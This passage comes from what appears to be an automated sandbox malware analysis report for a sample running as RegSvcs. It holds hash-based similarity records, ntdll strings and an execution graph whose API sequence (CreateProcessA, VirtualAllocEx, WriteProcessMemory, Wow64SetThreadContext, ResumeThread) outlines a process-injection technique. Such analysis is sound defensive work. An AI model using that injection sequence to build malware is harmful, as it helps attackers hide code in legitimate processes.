                                                                        • Instruction Fuzzy Hash: 52900231211C0142D20075684C18B47000597E0303F55C126A0154555CCA2589655621
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fd20a38bf030ebcf4ee13352b035ef165128ff3b77ef6cdd4464015d8a0061ab
                                                                        • Instruction ID: 5cc79f42183b2e272acf213d7da15ec9408c4f0faec28a8a6fbf78c7619043fd
                                                                        • Opcode Fuzzy Hash: fd20a38bf030ebcf4ee13352b035ef165128ff3b77ef6cdd4464015d8a0061ab
                                                                        • Instruction Fuzzy Hash: 4F90023120180502D1007158481874B000597E0302F55C022A1164556DC73589556671
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 84c623df19a8b3f15c797fb66b08f9b2ae6e768e0f6b0cdecd674253f00ddd0a
                                                                        • Instruction ID: ab891b469ef9e978eaac302aa57217e63862c521e0187bcf65467db1935d444b
                                                                        • Opcode Fuzzy Hash: 84c623df19a8b3f15c797fb66b08f9b2ae6e768e0f6b0cdecd674253f00ddd0a
                                                                        • Instruction Fuzzy Hash: D590023120180502D1007158480C787000597E0302F55C022A5164556EC775C9956631
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 880beb02a7ad6a20c0a5fb77956eedecbda8b39d65603845436aa1657ede65d0
                                                                        • Instruction ID: 785e5fb1135903bb6f9d0a030c1a26d42cee525b40662f28f3b669628cbf9876
                                                                        • Opcode Fuzzy Hash: 880beb02a7ad6a20c0a5fb77956eedecbda8b39d65603845436aa1657ede65d0
                                                                        • Instruction Fuzzy Hash: BE900231601401424140716888489464005BBF1211755C132A0998551DC66989695765
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 444f7c635a6fd9444177bb2ce673d90df7495f6d785c6be3b3503b743df9f3c3
                                                                        • Instruction ID: ca261d3b7a7c12dffd45322cd915048ff3c91c7656195ec748e0f3b15a1ae699
                                                                        • Opcode Fuzzy Hash: 444f7c635a6fd9444177bb2ce673d90df7495f6d785c6be3b3503b743df9f3c3
                                                                        • Instruction Fuzzy Hash: 1790023130140502D102715844186460009D7E1345F95C023E1424556DC7358A57A232
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6e8d711c86db67b40d72a6511b94265cf47fa04081c52e6ef8af13150b45310d
                                                                        • Instruction ID: 5ba8d0b706a0d0fbe36298ea6db5c3b6eaabbe034dfdaff31d66f9134624edf8
                                                                        • Opcode Fuzzy Hash: 6e8d711c86db67b40d72a6511b94265cf47fa04081c52e6ef8af13150b45310d
                                                                        • Instruction Fuzzy Hash: 2290027120180503D14075584808647000597E0302F55C022A2064556ECB398D556235
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c0b6992c1d7d0208ec5309f43a81783a66de20c1ab5bc3691dfb6296b5a11caa
                                                                        • Instruction ID: f61d11a078c3069cc859fbfff18bfa99ca11adb6dc82555ff8dc5cebeb420e67
                                                                        • Opcode Fuzzy Hash: c0b6992c1d7d0208ec5309f43a81783a66de20c1ab5bc3691dfb6296b5a11caa
                                                                        • Instruction Fuzzy Hash: CD90023160140602D10171584408656000A97E0241F95C033A1024556ECB358A96A231
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7dc82ea92cd34742746ecada69c32b2942dc3309fb918426d6c189f301d416df
                                                                        • Instruction ID: 7f185621527febbb44093cc083ae945a29362efa3ecb3c0b1a698f3de8cd40e7
                                                                        • Opcode Fuzzy Hash: 7dc82ea92cd34742746ecada69c32b2942dc3309fb918426d6c189f301d416df
                                                                        • Instruction Fuzzy Hash: 8590027120140502D14071584408786000597E0301F55C022A5064555EC7698ED96765
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d9fdf24e923385505c0c51c55e0b1a4bb814da7af2772c0a42e6f93375f2ed2a
                                                                        • Instruction ID: c272f97d74ee198e7fd30f0f134d92832d7c021105c4747b673b6165d4d6aa74
                                                                        • Opcode Fuzzy Hash: d9fdf24e923385505c0c51c55e0b1a4bb814da7af2772c0a42e6f93375f2ed2a
                                                                        • Instruction Fuzzy Hash: C690023120184542D14072584808B4F410597F1202F95C02AA4156555CCA2589595721
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6e45124fff60e10492976114ce930bdfb99b56345bcd1d35935ba54b160f4072
                                                                        • Instruction ID: 22474261e2ebcb7d2a19de0b4f8843c6f6dfc6cb3200453ff296b0e2f6e6fb98
                                                                        • Opcode Fuzzy Hash: 6e45124fff60e10492976114ce930bdfb99b56345bcd1d35935ba54b160f4072
                                                                        • Instruction Fuzzy Hash: D290023124140902D140715884187470006D7E0601F55C022A0024555DC7268A6967B1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d60a5820a68bf52cf4602a7dfdd8c0b97985668fcfd846c560aa23f55fadae8
                                                                        • Instruction ID: 26923b49c62bd21ab05fd64b13982f9cbaf9949233457b9f8eba9d94cdcaf0db
                                                                        • Opcode Fuzzy Hash: 1d60a5820a68bf52cf4602a7dfdd8c0b97985668fcfd846c560aa23f55fadae8
                                                                        • Instruction Fuzzy Hash: 0390023124545202D150715C44086564005B7F0201F55C032A0814595DC66589596321
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 917d248e6db02e6007e0b66cefb0b6468db03cef0a4841c9a5ba3c1c107ebbb0
                                                                        • Instruction ID: 5de36f85900b094b6f09dc308b3bd50602daa5588973f26e73ffabb78dde4868
                                                                        • Opcode Fuzzy Hash: 917d248e6db02e6007e0b66cefb0b6468db03cef0a4841c9a5ba3c1c107ebbb0
                                                                        • Instruction Fuzzy Hash: F090023520140502D51071585808686004697E0301F55D422A0424559DC76489A5A221
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e9e271312f24bdcb617f4bfcc80be50de6e0ab4f50c80e4f0067a77dbdecb65
                                                                        • Instruction ID: fd8d892b3ca3ade68b05edc5b65150b30129e9df33d794daedf369b83b19d566
                                                                        • Opcode Fuzzy Hash: 7e9e271312f24bdcb617f4bfcc80be50de6e0ab4f50c80e4f0067a77dbdecb65
                                                                        • Instruction Fuzzy Hash: DB90023120240242954072585808A8E410597F1302B95D426A0015555CCA2489655321
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction ID: e92e6181618958a10a58889b768929d238eb8c5b276a41f028c9df8da4f78d73
                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction Fuzzy Hash:
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: 20cdd772f2ec0a9f3e1b961e164b267f392f339a2cf229f44ee0665facadf5b8
                                                                        • Instruction ID: b8006cddcf04347b0d2a17a02805051ad7e2b369b2637d3c591a99c7fb3d4af1
                                                                        • Opcode Fuzzy Hash: 20cdd772f2ec0a9f3e1b961e164b267f392f339a2cf229f44ee0665facadf5b8
                                                                        • Instruction Fuzzy Hash: 0751F3B2B00116BFCB11DF9D8880D7EFBB8BB59244714C22BE469D3651D374DE048BA1
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: cd0e0e72dc5003a193763dbcf3ed6dfddf816994f74c9de675f865fab7a79ccd
                                                                        • Instruction ID: 9f5621ee5ce9ad780a775780d2ce2fbc7cb4f3eb66ad80478f1fda8c2b7b7cc9
                                                                        • Opcode Fuzzy Hash: cd0e0e72dc5003a193763dbcf3ed6dfddf816994f74c9de675f865fab7a79ccd
                                                                        • Instruction Fuzzy Hash: 6D511571A00646AFCF30DF9DC9A0D7FBBF8EB44204B54846FE896D3651E6B4EA008760
                                                                        Strings
                                                                        • Execute=1, xrefs: 01494713
                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01494655
                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01494742
                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01494787
                                                                        • ExecuteOptions, xrefs: 014946A0
                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014946FC
                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01494725
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                        • API String ID: 0-484625025
                                                                        • Opcode ID: 458e1fbe02e6346d4d1377ea602778df2d4be8816e3068266eda712b9adf81dc
                                                                        • Instruction ID: ad862b95476a79597cd59283b52feabcdb34cad104b4705bda3ac57ed64bc6cb
                                                                        • Opcode Fuzzy Hash: 458e1fbe02e6346d4d1377ea602778df2d4be8816e3068266eda712b9adf81dc
                                                                        • Instruction Fuzzy Hash: E95160316002097ADF119B95EC85FAE7BACAF24315F5400BFD909A72B1D770DE468F61
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-$0$0
                                                                        • API String ID: 1302938615-699404926
                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                        • Instruction ID: 4b2cc6140c5775eef3be87593ccc589b279aba2cebb399959635c9f03f7b5fb4
                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                        • Instruction Fuzzy Hash: 3B81C070F0524A8EEF258E6CC8517FEBBA9EF55328F18411BD955E73A1C73888418B63
                                                                        Strings
                                                                        • RTL: Re-Waiting, xrefs: 0149031E
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014902E7
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014902BD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                        • API String ID: 0-2474120054
                                                                        • Opcode ID: 4f7f43d2fd14debc3cbfa663e3598425c939c8c540142ac82bc0973b8ea94af8
                                                                        • Instruction ID: 82770a62b65fc0f2654f5e6cbf50b80acbe02471511c1a78e3ace046eee606f1
                                                                        • Opcode Fuzzy Hash: 4f7f43d2fd14debc3cbfa663e3598425c939c8c540142ac82bc0973b8ea94af8
                                                                        • Instruction Fuzzy Hash: 86E18B706047429FEB25CF2CC884B2ABBE4AB94314F140A5EF5A58B3F1D775D94ACB42
                                                                        Strings
                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01497B7F
                                                                        • RTL: Re-Waiting, xrefs: 01497BAC
                                                                        • RTL: Resource at %p, xrefs: 01497B8E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 0-871070163
                                                                        • Opcode ID: 5121ad276460454366262617096d81c69e000ebdd96ef3c928c5204a1c24d548
                                                                        • Instruction ID: edb61785349b45b18308091a3b433f6f66dee57a9200fbf13a09f5e64d699d43
                                                                        • Opcode Fuzzy Hash: 5121ad276460454366262617096d81c69e000ebdd96ef3c928c5204a1c24d548
                                                                        • Instruction Fuzzy Hash: CB41E4327007029FDB21CE29C850B6BB7E6EF98725F100A1EEA56D77A1D771E405CB91
                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0149728C
                                                                        Strings
                                                                        • RTL: Re-Waiting, xrefs: 014972C1
                                                                        • RTL: Resource at %p, xrefs: 014972A3
                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01497294
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 885266447-605551621
                                                                        • Opcode ID: 84e5fce5f572011186dcd55e33d26953b5b1729a96b230fb6e831cad8339abf3
                                                                        • Instruction ID: 94107e2cb21baea99dc55c79cdd568d767a056325145833b163275f22a372813
                                                                        • Opcode Fuzzy Hash: 84e5fce5f572011186dcd55e33d26953b5b1729a96b230fb6e831cad8339abf3
                                                                        • Instruction Fuzzy Hash: FF411431610206ABCB21CF25CC41B6ABBA5FF65715F10062EFD559B361DB31E8068BD1
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$]:%u
                                                                        • API String ID: 48624451-3050659472
                                                                        • Opcode ID: f7e5ad4be51c24a2ce99f24ed741379a867a0a729582cac3a07b64312a32bb0d
                                                                        • Instruction ID: 8a3d47bf071881e0cc57fab18189bf4036fb35a156eab6671be3235bbfc47864
                                                                        • Opcode Fuzzy Hash: f7e5ad4be51c24a2ce99f24ed741379a867a0a729582cac3a07b64312a32bb0d
                                                                        • Instruction Fuzzy Hash: 4F317F72A002299FDB60DF39CC50FEFB7F8AB54610F54055BE949E3210EF70AA448BA0
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-
                                                                        • API String ID: 1302938615-2137968064
                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                        • Instruction ID: 37bd394eea8d88816a25c54c08051276187826e2c53e13ea3d3ec9271bb9d17d
                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                        • Instruction Fuzzy Hash: 6791D370E002069BEB28CF6DC890ABFBBA9EF5472EF14451BE955E73E0D73489418712
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$@
                                                                        • API String ID: 0-1194432280
                                                                        • Opcode ID: 9bb98da2bc9bc25e18f3757afe47c089ece8a59f8cc3465ec7f78b9887038825
                                                                        • Instruction ID: 2e8e88c5259bba616b4415033769b9e5ce8397c1ecab7ef3ef95763b0505ed94
                                                                        • Opcode Fuzzy Hash: 9bb98da2bc9bc25e18f3757afe47c089ece8a59f8cc3465ec7f78b9887038825
                                                                        • Instruction Fuzzy Hash: E0812871D002799BDB319B54CC44BEEBAB8AF48714F0441EBEA19B7250D7709E85CFA0

                                                                        Execution Graph

                                                                        Execution Coverage:11.1%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:309
                                                                        Total number of Limit Nodes:29
                                                                        execution_graph 47745 8f81d98 47747 8f81db7 47745->47747 47746 8f81f3d 47747->47746 47750 8f81f58 47747->47750 47754 8f81f48 47747->47754 47751 8f81f61 47750->47751 47753 76199c2 DrawTextExW 47751->47753 47752 8f81f85 47752->47747 47753->47752 47755 8f81f58 47754->47755 47757 76199c2 DrawTextExW 47755->47757 47756 8f81f85 47756->47747 47757->47756 47403 761e0e0 47404 761e0e5 47403->47404 47405 761e196 47404->47405 47406 761e1ab 47404->47406 47411 761c2ec 47405->47411 47407 761c2ec 3 API calls 47406->47407 47409 761e1ba 47407->47409 47412 761c2f7 47411->47412 47413 761e1a1 47412->47413 47416 761ef00 47412->47416 47422 761eeef 47412->47422 47428 761c324 47416->47428 47419 761ef27 47419->47413 47420 761ef3f CreateIconFromResourceEx 47421 761efce 47420->47421 47421->47413 47423 761ef1a 47422->47423 47424 761c324 CreateIconFromResourceEx 47422->47424 47425 761ef27 47423->47425 47426 761ef3f CreateIconFromResourceEx 47423->47426 47424->47423 47425->47413 47427 761efce 47426->47427 47427->47413 47429 761ef50 CreateIconFromResourceEx 47428->47429 47430 761ef1a 47429->47430 47430->47419 47430->47420 47588 7614cb0 47589 7614cb5 47588->47589 47592 7614188 47589->47592 47594 7614193 47592->47594 47593 7614673 47594->47593 47596 7614198 47594->47596 47597 76141a3 47596->47597 47601 7619988 47597->47601 47605 7619978 47597->47605 47598 761996f 47598->47593 47602 761998d 47601->47602 47609 76199c2 47602->47609 47603 76199b6 47603->47598 47606 7619988 47605->47606 47608 76199c2 DrawTextExW 47606->47608 47607 76199b6 47607->47598 47608->47607 47610 7619a0b 47609->47610 47611 76199fa 47609->47611 47610->47611 47614 761a100 47610->47614 47619 761a0f0 47610->47619 47611->47603 47615 761a128 47614->47615 47616 761a22e 47615->47616 47624 761a748 47615->47624 47630 761a758 47615->47630 47616->47611 47620 761a128 47619->47620 47621 761a22e 47620->47621 47622 761a748 DrawTextExW 47620->47622 47623 761a758 DrawTextExW 47620->47623 47621->47611 47622->47621 47623->47621 47625 761a71c 47624->47625 47626 761a752 47624->47626 47625->47616 47626->47625 47635 761abc0 47626->47635 47639 761abb0 47626->47639 47627 761a7e4 47627->47616 47631 761a75d 47630->47631 47633 761abc0 DrawTextExW 47631->47633 47634 761abb0 DrawTextExW 47631->47634 47632 761a7e4 47632->47616 47633->47632 47634->47632 47644 761b008 47635->47644 47649 761affa 47635->47649 47636 761abde 47636->47627 47640 761abb5 47639->47640 47641 761abde 47640->47641 47642 761b008 DrawTextExW 47640->47642 47643 761affa DrawTextExW 47640->47643 47641->47627 47642->47641 47643->47641 47645 761b039 47644->47645 47646 761b066 47645->47646 47654 761b088 47645->47654 47659 761b078 47645->47659 47646->47636 47651 761b039 47649->47651 47650 761b066 47650->47636 47651->47650 47652 761b078 DrawTextExW 47651->47652 47653 761b088 DrawTextExW 47651->47653 47652->47650 47653->47650 47656 761b0a9 47654->47656 47655 761b0be 47655->47646 47656->47655 47664 761a0d4 47656->47664 47658 761b129 47661 761b088 47659->47661 47660 761b0be 47660->47646 47661->47660 47662 761a0d4 DrawTextExW 47661->47662 47663 761b129 47662->47663 47666 761a0df 47664->47666 47665 761ccf9 47665->47658 47666->47665 47668 761d868 DrawTextExW 47666->47668 47669 761d858 DrawTextExW 47666->47669 47667 761ce0c 47667->47658 47668->47667 47669->47667 47431 76058a2 47435 7607380 47431->47435 47451 7607390 47431->47451 47432 7605641 47436 7607390 47435->47436 47443 76073b2 47436->47443 47467 7607bc3 47436->47467 47471 7607f9f 47436->47471 47475 76079bd 47436->47475 47480 7607b9a 47436->47480 47485 7607738 47436->47485 47491 7607a77 47436->47491 47496 7607ab2 47436->47496 47500 7607f0c 47436->47500 47505 7607b88 47436->47505 47510 7607748 47436->47510 47515 7607b08 47436->47515 47520 7607825 47436->47520 47525 7607a05 47436->47525 47443->47432 47452 76073aa 47451->47452 47453 7607bc3 2 API calls 47452->47453 47454 7607a05 2 API calls 47452->47454 47455 7607825 2 API calls 47452->47455 47456 7607b08 2 API calls 47452->47456 47457 7607748 2 API calls 47452->47457 47458 7607b88 2 API calls 47452->47458 47459 76073b2 47452->47459 47460 7607f0c 2 API calls 47452->47460 47461 7607ab2 2 API calls 47452->47461 47462 7607a77 2 API calls 47452->47462 47463 7607738 2 API calls 47452->47463 47464 7607b9a 2 API calls 47452->47464 47465 76079bd 2 API calls 47452->47465 47466 7607f9f 2 API calls 47452->47466 47453->47459 47454->47459 47455->47459 47456->47459 47457->47459 47458->47459 47459->47432 47460->47459 47461->47459 47462->47459 47463->47459 47464->47459 47465->47459 47466->47459 47530 7604ee0 47467->47530 47534 7604ed8 47467->47534 47468 7607be4 47538 7604e00 47471->47538 47542 7604e08 47471->47542 47472 7607fc2 47472->47443 47476 76079c3 47475->47476 47546 7605090 47476->47546 47550 7605088 47476->47550 47477 76079e6 47477->47443 47481 7607c5c 47480->47481 47554 7604fa0 47481->47554 47558 7604f99 47481->47558 47482 7607bb0 47482->47443 47486 7607713 47485->47486 47488 760773f 47485->47488 47486->47443 47487 760834d 47487->47443 47488->47487 47562 7605228 47488->47562 47566 760521c 47488->47566 47492 7607a89 47491->47492 47493 7607f2b 47492->47493 47570 7604920 47492->47570 47574 7604919 47492->47574 47498 7604fa0 WriteProcessMemory 47496->47498 47499 7604f99 WriteProcessMemory 47496->47499 47497 7607ad6 47497->47443 47498->47497 47499->47497 47501 7607f2b 47500->47501 47502 7607b1f 47500->47502 47502->47500 47503 7604920 ResumeThread 47502->47503 47504 7604919 ResumeThread 47502->47504 47503->47502 47504->47502 47506 7607c22 47505->47506 47508 7604e00 Wow64SetThreadContext 47506->47508 47509 7604e08 Wow64SetThreadContext 47506->47509 47507 7607c3d 47508->47507 47509->47507 47512 760777b 47510->47512 47511 760834d 47511->47443 47512->47511 47513 7605228 CreateProcessA 47512->47513 47514 760521c CreateProcessA 47512->47514 47513->47512 47514->47512 47516 7607b0e 47515->47516 47517 7607f2b 47516->47517 47518 7604920 ResumeThread 47516->47518 47519 7604919 ResumeThread 47516->47519 47518->47516 47519->47516 47522 7607818 47520->47522 47521 760834d 47521->47443 47522->47521 47523 7605228 CreateProcessA 47522->47523 47524 760521c CreateProcessA 47522->47524 47523->47522 47524->47522 47526 7607a28 47525->47526 47528 7604fa0 WriteProcessMemory 47526->47528 47529 7604f99 WriteProcessMemory 47526->47529 47527 7607cd9 47527->47443 47528->47527 47529->47527 47531 7604f20 VirtualAllocEx 47530->47531 47533 7604f5d 47531->47533 47533->47468 47535 7604f20 VirtualAllocEx 47534->47535 47537 7604f5d 47535->47537 47537->47468 47539 7604e06 Wow64SetThreadContext 47538->47539 47541 7604e95 47539->47541 47541->47472 47543 7604e4d Wow64SetThreadContext 47542->47543 47545 7604e95 47543->47545 47545->47472 47547 76050db ReadProcessMemory 47546->47547 47549 760511f 47547->47549 47549->47477 47551 76050db ReadProcessMemory 47550->47551 47553 760511f 47551->47553 47553->47477 47555 7604fe8 WriteProcessMemory 47554->47555 47557 760503f 